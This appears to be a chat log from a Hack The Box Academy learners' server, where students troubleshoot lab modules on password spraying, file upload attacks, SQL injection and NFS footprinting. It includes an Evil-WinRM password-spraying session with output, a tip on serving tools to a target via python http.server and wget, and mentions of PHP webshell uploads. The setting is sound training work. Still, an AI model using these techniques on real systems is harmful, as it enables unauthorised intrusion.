Don't share direct code as it's a spoiler
oh sorry
That's like.. three times..
There's a reason it was deleted at first
sorry
its there 😉
I've found my new favorite fake user/pass to use in account creations like gitlab "apple:bee" 
pfff my mistake was with the username and not the password.... 😮💨
hi, I have a problem with AD Internal Password Spraying
```
*Evil-WinRM* PS C:\tools> Import-Module .\DomainPasswordSpray.ps1
*Evil-WinRM* PS C:\tools> Invoke-DomainPasswordSpray -Password Winter2022 -OutFile spray_success -ErrorAction SilentlyContinue
[*] Now creating a list of users to spray...
[*] There appears to be no lockout policy.
[*] Removing disabled users from list.
[*] There are 2940 total users found.
[*] Removing users within 1 attempt of locking out from list.
[*] Created a userlist containing 0 users gathered from the current user's domain
[*] The domain password policy observation window is set to minutes.
[*] Setting a minute wait in between sprays.
```
it is not giving me users, how to solve it?
Add a ! To the end of the password?
ping srv02
i don't understand why i add a ?
password policies :P
Can someone help me with the API attack module? Broken authentication and MasonJenkins@ymail.com?
My idea is to use the password resets function and iterate through the OTPs. But somehow my ffuf command returns nothing And I can't login with my suggested password. Any hints? PM for command
Using the examples shown in this section, find a user with the password Winter2022. Submit the username as the answer. It is not working
Lemme check my notes.
it's been a min since i've done that module
You can DM.
add the .txt extension to the -OutFile
otherwise reset the target wait 5-10 minutes for all services to start up, try again
did you run powershell as admin
try actually remoting in via RDP
instead of win-rm
as the instructions state to RDP to the target
okay thank you
about?
@rustic sage no sharing of payloads etc for modules above Tier 0, please
Oh sorry didnt realize that wasnt allowed!
Mention which module / section you're stuck on, someone may reach out and DM to provide some advice
Yeah
Nobody reads the ToS
😢
reading is for nerds
Are there hackers here?
So that's fine
what do you need help with?
Dear HTB community. Please save my sanity. If anybody is available to assist me with the Client side prototype pollution please DM.
Thanks 🙂
@fathom pendant I was wondering if anyone knows how to make money.
that wasn't an invitation to DM @latent moss
Job
The 8-5 thing has been working for me
@fathom pendant 😂

just making assumptions bc i saw message requests: 1 right after asking
different username
that i immediately forgor
bc i yeet and delete them
Is everyone here a white hat hacker?
This platform/server revolves around whitehat hacking
not illegal shit like carding
@fathom pendant I understand
not to mention servers that would provide assistance with illegal activities generally won't last long
especially if they're open to the public
@fathom pendant So, is it difficult to get into this business?
@fathom pendant Is it possible to become a hacker from your phone?
lol not without a substantial amount of skill
hacking from your phone is a big meme
most people have a dedicated workstation/laptop with a pentest VM that they run off of
@fathom pendant Dude, I needed money for a computer, so I found this place, hoping you might know a way.
Everyone is born with nothing, some have family with wealth, some earn it, some get lucky
Gotta run with the hand you got, and start getting that wonga
Anyone who doesn't inherit money has always started working at a crappy job, well.. most I guess
Gotta put the effort in, in all things in life
@ocean night That's why I asked if there was a way to make money.
get a job
you don't have to jump out the gate into pentesting/cyber
that's how you make money
Stack shelves, do a paper run, odd jobs, car wash, gardening
Get money enough to get kit to help you grow (e.g. laptop)
i've put an application to a small store up the street that has nothing to do with IT/Cyber
Keep growing, keep earning
silly holiday delaying my app being read by HTB 
I mean, can I make money through social media? If I'm going to get into this business, should I use my laptop or should I use a cash register directly (I'm translating it from Google, it's a little late)
making money through social media is ROUGH
If you don't mind.. what point of education are you in?
(I am NOT asking your age)
so don't be too specific
Secondary, college?
How old do you think I am?
I'm not going to guess
17
yeah figured, you have high expectations with little actual experience
focus on finishing school first
then get some job that can give you the spending money for your own personal improvement
No, I'm not expecting anything big, I just asked for a place where I could talk about artificial intelligence, she suggested this place, I was just asking a question.
If your hobby is computers, programming, keep growing that hobby
But yeah.. focus on schooling first
Self taught are sometimes some of the best and most adaptable people I've seen
if you read and follow the instructions in #welcome you can ask more in #programming as we're veering this conversation off-topic
sometimes, college and uni works better for people
It's all down to how you absorb knowledge, your persistence and drive to improve yourself, or to be shown the path and follow it as in higher education
@ocean night Anyway my friend, I understand you, thank you
👍 all the best
what kinda g0blin are you anyway
Start saving early, too
Every little counts 🙂
A MTG red deck g0blin
Cheap to cast, but devastating in numbers
mind goblin?
my favorite MTG gob is the one that lets you throw other goblins, maximum goblin efficiency
hehehe
I stopped playing around 7th ed
but I have a nice collection of gobbos from there and prior
I found my old Niv-Mizzet Highlander deck
lots of ping for 1 damage and draw cards 
🙂
@ocean night Dude, I'm leaving, thank you for your help.
Loved playing "no holds barred" games.. no enforce starting deck size, coming up with stupid ass once turn booooooom
I still will not forgive them for implementing a limit on lightning bolts in the deck lol
Anyway sorry, totally off topic, going back to general
how to fix this problem? I cannot download because the hackthebox rdp does not have internet, and even though I have shared the desktop of my attack box the errors persist
try transferring the files to the host instead of running it from the shared folder
also you have a shared drive attached...
just cp /shared/file ~/
gives error i tried that
lemme try again and share
Try with remmina
also i could have sworn kerbrute is already on that host
It doesn't Connect using remmina
Okay, sorry
always try and see if a tool exists on the host before attempting to install
okay thanks a lot
can someone please help me with the exploits module?
i can't even send a screenshot or copy the console, but i'm on the exploiting part of getting started and when i follow the instructions i don't get the same output
dude i forgot how powerful -exec is in the find command
don't copy the example 1::1 use your own IP where needed, and the targetIP where also required
also getting started is the module; public exploits would be the section
you're not gonna get the same exploit as the example; I suggest (usually) when given a publicIP:Port attempt to visit it in a browser
The "instructions" in the section are general and basic "how to" once you find some info to go off of
Also keep in mind that any tools that need to be transferred to a target can be done so through serving the tool up using a web server on your attack machine. My favorite method of doing this is python3 -m http.server 8000. Then use wget from the target to retrieve the files.
well, yeah, i put in the correct ip and port and stuff
yes but it might not be using the same exploit as the example :)
in order to crack an egg, you must first find the egg
so i first have to find services to exploit and then search for an exploit for that?
👍
it's a safe bet in most instances with an IP:PORT that it's hosting a webserver (in htb's case)
unless otherwise explicitly told
often the best way to find a service, is just by looking at the page :)
so even the http is a service that can be exploited?
Okay gotcha
Hey, in the File Upload Attacks module, Client Side Validation section, I try to upload a .php file even after editing out the validate function using the inspect option and all, and I'm not able to upload the .php shell
Also I try to capture the req using Burp, that also isn't getting captured, I don't know what the problem is
do you have interceptor turned on, and your foxyproxy turned on so burp can catch the request?
but there's no req made when going to grab the file from your system to upload. if you're referring to the server response that serves you the page, you'd need to hard reload the page [Ctrl+Shift+R], otherwise the browser serves from cache, which doesn't send a req
add .php to the list of allowed extensions
I was refering when i put a pic from my system and then click on upload there should be a req captured in burp right
if you have it set up properly
as i stated earlier
is intercept on
is foxyproxy turned on for burp/8080
i havent had to use foxyproxy in awhile tbh
Ya both were on
you should also enable the response capture
Actually, one time I got a response; later I had to restart the lab, then no response was being captured
by default only requests are captured and you have to enable the response capture
but you're not using the index.php page to run the script
you're running the php from a completely different endpoint
Hi has anyone here solved Modern Web Exploitation techniques Skills Assessment.
Any hints on how to get htb-stdnt password?
I did.
I got the SQL injection from the only thing working in this site and it has no passwords.
well then do enumeration with sqli can you pull databases or some such that may contain passwords
utilize the technique you're exploiting beyond just "well sqli works"
Hello, I am doing the Skills Assessment for Windows Fundamental. I am a bit stuck on step 6 (https://academy.hackthebox.com/module/49/section/1015):
- Adding the HR security group to the shared Company Data folder and NTFS permissions list
- Disable Inheritance before issuing specific NTFS permissions
After disabling the inheritance (Advanced > Disable Inheritance > Disable Inheritance before issuing specific NTFS permissions), I add the HR group and set the NTFS permissions.
But after, I don't have any permission to configure the folder. I am kind of locked out, I can't delete it as well.
What am I doing wrong?
it's a T3 module that likely assumes you know the basics of other simple techniques
did you remove other groups from the share?
I just pressed the "Disable Inheritance" button and then "Remove all inherited permissions from this object".
unless in specific circumstances you're almost always going to Convert Permissions
Ok, I saw I can add myself back as a security principal and now it works.
Thanks!
the second option is if you have a BUNCH of inherited permissions and it's just faster to start from scratch
like 15+
The database has no passwords or anything
I pulled the whole database
idk then dude ¯\_(ツ)_/¯
No table for users
i haven't done this module
i'm just spitballing
there's more you can do with sqli as well like potentially uploading a webshell
How did this scan get port 22
Dear HTB community. Please save my sanity. If anybody is available to assist me with the Client side prototype pollution payload for the Whitebox attacks module, then please DM.
it didn't
who did
Tried that
I vaguely remember it but sure what's your problem?
just an error in the example
Can I DM you?
Yeah
they make shit up
nah
what likely happened is they copied output from doing a scan with port 22; and just left it in
it's kinda confusing
it's ultimately unnecessary ¯\_(ツ)_/¯
most of my notes don't contain the example output unless i can't perform the same thing against the target(s)
Can anyone help me with the NFS footprinting module? I'm using exegol as a container and I can't mount because of "permission denied".
did you try with sudo?
i've no experience with exegol so i'm not sure what could be preventing it tbh
cmd: sudo mount -t nfs 10.129.202.5:/var/nfs ./target-NFS/ -o nolock
mount.nfs: Operation not permitted
Perfect thanks
You tried mount on /tmp
Yes
And i have the same error : permission denied
I think its my container exegol or bad configuration of the server nfs and the nfs client
Surely try to review your configuration
```javascript
function generateSerial() {
    // ...SNIP...
    // Fire a POST to /serial.php with an empty body (async).
    var xhr = new XMLHttpRequest();
    var url = "/serial.php";
    xhr.open("POST", url, true);
    xhr.send(null);
}
```
As previously mentioned, the above-used method of obfuscation is packing. Another way of unpacking such code is to find the return value at the end and use console.log to print it instead of executing it.
I don't understand: Another way of unpacking such code is to find the return value at the end and use console.log to print it instead of executing it.
Following through the steps on meterpreter tunneling/port forwarding, still can't get to replicate the results from the module. It's showing that the port is filtered instead of the expected open -- doing this on a newly started pwnbox, no other modifications aside from the ones listed on the module itself:
i wouldn't generally worry too much about it saying filtered if you can interact with it via rdp
sometimes it's just like that
in short: don't worry about replicating the examples as sometimes it's just not possible
TY
Wdym?
You unpacked the code there
It's basically saying instead of executing the code, you replace the execution with console.log
And that's it
The text is likely referring to using a tool to unpack it for you instead of manually
yes, that code is already deobfuscated the example code is obfuscated and long, but I don't understand: Another way of unpacking such code is to find the return value at the end and use console.log to print it instead of executing it.
The return value == literally where it says "return"
return console.log(thing)
unpack = deobfuscate
Yes
It appears that the malware is dropping a .tmp file following the infection. Enter the complete name of this .tmp file as your answer. Answer format: _.tmp
Is it possible to exploit the nfs port with metasploit?
Hey all, I am on a windows host with an elevated system shell, I have imported both the ActiveDirectory and PowerView modules but Get-DomainObjectACL still returns 'not recognized' . Are there any gotchas I may have overlooked?
Why?
Also I don't think nfs has any vulns
For the nfs section footprinting module
Try the same command in the pwnbox
As exploiting nfs isn't in scope for that module
Just mount and explore
Ok yes thanks, i forgot the pwnbox, i'll try this when i come back home
But what it feels like is that your user doesn't have mount permission in your vm

